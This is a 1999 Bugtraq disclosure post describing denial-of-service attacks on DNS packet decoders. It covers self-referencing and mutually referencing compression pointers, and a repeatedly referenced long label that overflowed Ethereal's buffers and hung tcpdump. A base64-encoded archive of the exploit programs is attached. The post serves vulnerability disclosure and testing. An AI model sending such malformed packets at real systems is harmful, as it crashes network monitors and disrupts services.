weaknesses in dns label decoding, denial of service attack (code included)
Date: Sun, 30 May 1999 15:32:58 +0200
From: Sebastian <scut@NB.IN-BERLIN.DE>
To: BUGTRAQ@netspace.org
Subject: weaknesses in dns label decoding, denial of service attack (code included)
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---1463811696-492060995-928071178=:9647
Content-Type: TEXT/PLAIN; charset=US-ASCII
keywords: some dns packet decoders (sniffers, ids systems (?), dns
servers) may be vulnerable to malformed compressed domain names
inside dns packets.
sorry aleph1, if this has already been known or posted =)
hi,
as I played with the DNS RFC (1035 especially) i came up with the idea to
create malformed compressed dns domains inside the DNS packet to make it
impossible for the DNS packet decoder to decompress it, which might lead
to a denial of service attack.
On my tests I found my BIND servers resisting all attacks (three different
types), but all sniffers I used to view the DNS packets send to the
server behaved in a very "special" way.
First test (pointing-to-itself-compression (zlip-1.c))
The DNS domain consists out of multiple labels, and message "compression"
allows you to let a pointer point to a previous label inside the packet,
to save bytes in the DNS packet. I just created a pointer that points to
itself, meaning on a recursive domain decompression (like etherreal uses),
this will produce effects like segfaulting or hanging.
Etherreal alloc's memory until the system crashes, tcpdump stopped working
before the packet is received, on SIGINT, it displays the malformed
packet, but dropped all other packets:
14:57:59.025013 128.75.9.2.48078 > victim.ns.org.domain: 30993 Type49159
(Class 49168)?
Second test (crossreferencing pointers (zlip-2.c))
Similar to the first code, but now two pointer are used to reference each
other, speeding up the effect on Etherreal.
Results are the same as in the first test.
Third test (very long label, decompressed multiple times (zlip-3.c))
This time I used a long label (maximum of 63 characters), and referenced
to it a dozend times, this will decode to a very long domain, therefore
it may overflow some fixed-sized-buffers (because the rfc says "limited to
500 characters" some programmers may prefer fixed buffers for dns
decoders). This is the case in Etherreal, where such a request creates a
segmentation fault (due to a buffer overrun).
I just tested this with BIND as nameserver, which resisted all this tests,
but I included the "exploit" code in this email to allow you to test your
IDS, sniffers and nameservers against this.
cu,
scut
--
- scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet --
-- you don't need a lot of people to be great, you need a few great to be --
-- the best -----------------------------------------------------------------
---1463811696-492060995-928071178=:9647
Content-Type: APPLICATION/x-gunzip; name="zlip.tar.gz"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.05.9905301532580.9647@nb.in-berlin.de>
Content-Description: zlip.tar.gz
Content-Disposition: attachment; filename="zlip.tar.gz"
H4sIANNVezcAA+1abW/TSBDmq/0r5npCl5S0OC9NBKUgBJyuEgLUgjgJULSx
14mF4zW766btwX+/Z9d2m5a0SSnlRdqnpOt9G8/O7szO03CcJvlGezO8dYNo
B0G/16NbZBCcK4l6/UGHqD/o9vu9rc5gQNQOelu9WxTcpFI1CqWZJLolhdCX
jVvW/5vi7jod4wjQBmVsyiOKeJawlERMisuDJOTEtGbhR+XTOv7RvXvBVjfA
8FgUWUQMH36YpyLRmDw6IhUWmu6S5kpUM/QkURQnKSeUmcgoL0ZpEkLER85z
SjRpQUeikIqncTVHoYpXj5iCVOhSRPmdiGm2GVIsxZSkKDT/S1GajDKuMeOu
7/+ZZGFaRJweKB0lYnPycK6pHGja/CTT/pQlGTXwREyOwxaFE5yB9XVUDpr+
f76HHk+J8CN6tn2vGKYiG3tKhsMkb1GkNErbriZCatuRS007FJS9qNhuI9Zb
HxXxXO0Tqhi59v4wDN4fBmFVDsqyHVRlVe9U9c5gzfc8r5rVrVrjGCU+QTD3
adfl2na5EPPGocI7O91t3/dyicaYGmsr7fv7bK1p5GCCMRX9sUO9JsFEp3Le
Z4ViY36fbivYXoZJ/tCWOWyDJxgELZDTMsY+eBd8MAI9foidbzz7d/f18O/H
u8/f7D0zzV+gYGlngsLlrg2NhkOJE5UecKvGwbv2hxYFZsKp7RvVdjShuUiq
cR37snLHLpfYrSVWG4jBW9ZeZumVSjvYYfr8uToBtnrOFkl2wNIkInWUaXZY
Ge/CtZro53vlgQhZmoqQGu0WNd48fTX8h+7Qblk8fbFvy3Ijm/V+2Hk79OLN
8+eVFlxKIaHFC0FTPhXyCF4qKcc2cn25Jr5XWUZxHmH5xq8bTbN84wZQT+Q8
G0o2G5p6Y/fVq72Xr18O9x6/tWKtjezAHdpof62N6VumQmmMSo1RkaSRsXHD
q41x1gotD5ErFJnmcGKVHHMTA+AhXtDyTJcW6lwLduV+k0Z61qLZhGmKBFfU
6XVgKpbRo3OjY8nGdVO/V8nUad1UGwDKWU1UMcql0CIUJ0OqcGFnqlyImNF2
s+4sT1DZCW/TyZQyRVhv1W82tezN2VEqGCJtKjmLjhBOuTy/WIXjXDfBOs1t
22ptSAh05QFAPY65tLHyrJkRXWHnxokr2WP9qPaVMdf1gXi1V7T7TbpP1dBy
6WWsNt4+v7q6e6tLhSpwuI++Xlu9f1dYW+UVWOLJClmssSzYbgIhCxcYwbYN
76L1WDXNEJyQBlSgmE1FoUhk3JyYWh1E1cDoVGqlIYDJiD4VXJ6srF13t8+2
n0zLBG5MNeNSLewqNAJYoplOEJaSDM47xTOuzEWDoygxfQjaC0YaJ6kHV/s+
S/TEWJimLDXj+Tnla78qJ5Vd8451anwU1imrczaDykZdXOMXn7RI4P7jyCOK
qY1cLZp3IVrs5DYAhYg+9hU2HJS3shVweZSsgmRID5YMPBvAT940gztzhBFB
KVcKqQ1Smiqef5m7REMxzVOO5KdVzbgdlWNNVlN7No6wuVW5tLdgaJcVS86t
JWxNcl3IzKhrIyi8bz5AwuNsdf/NkyfP9vcxAxH7++R/JgnY6PzU/H8r6AR1
/j/od9o2/++6/P+HwOX/S/L/FiU3TAH4WSrwO1CArW+hAPTA3KuZdlzAcYGV
uIBRuJHghXOb2MMmUkIPKUCxsVGKvzZpWMAarkgbFvGGRcRhFeZwOXVYyh1W
JQ+LMuwV6cMN84clBGJVBnHRAlflEN+fRKzEIi6kEZfxiKsRiSswiW+hEku5
xLeSieuziWvQiavwiasRCsMork0pbOT+RViFw+8Cy/+6P5f/dYJuxf+2gvag
4n8dx/9+BBz/+5n8r8uNdVLOkXhqxP/xLEnTUDI1MQZJEySO/DTU46pVheQT
dvJz7kukcJ4hnrZet1wmNQi+4plYDTSnxqf6KnKU01FORzkd5XSU01FORzkd
5XSU89eAScc24YI3+Y4l/I/6nX7N/zr9QWD4X7/jvv/7IfDHIaiYKEngcfWf
QWnjLS4/2kgNufLrVo9nkYkjLVyciBtgKyY6JNrwNqQmyqTjyOhNLEFuq0xA
j1M2a5mky1ySuC5TsuSGG+aWFYd+/e1zLRrdAr8lR/jlWWhegfxnoexLxBI/
APeImTIX7HYTA3WYR8U0x+0nckUzIT9CtF//7cMLIcOuh9GBuTcM10PWZVmi
noBsjic0LVIwivScFpAN8mLuJXvjT0DjTJwE1xibyea2tk9GW2EoXCpmik70
NqaEnBHEViya4dmFRAcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcH
BweHVfA/AO315gBQAAA=
---1463811696-492060995-928071178=:9647--
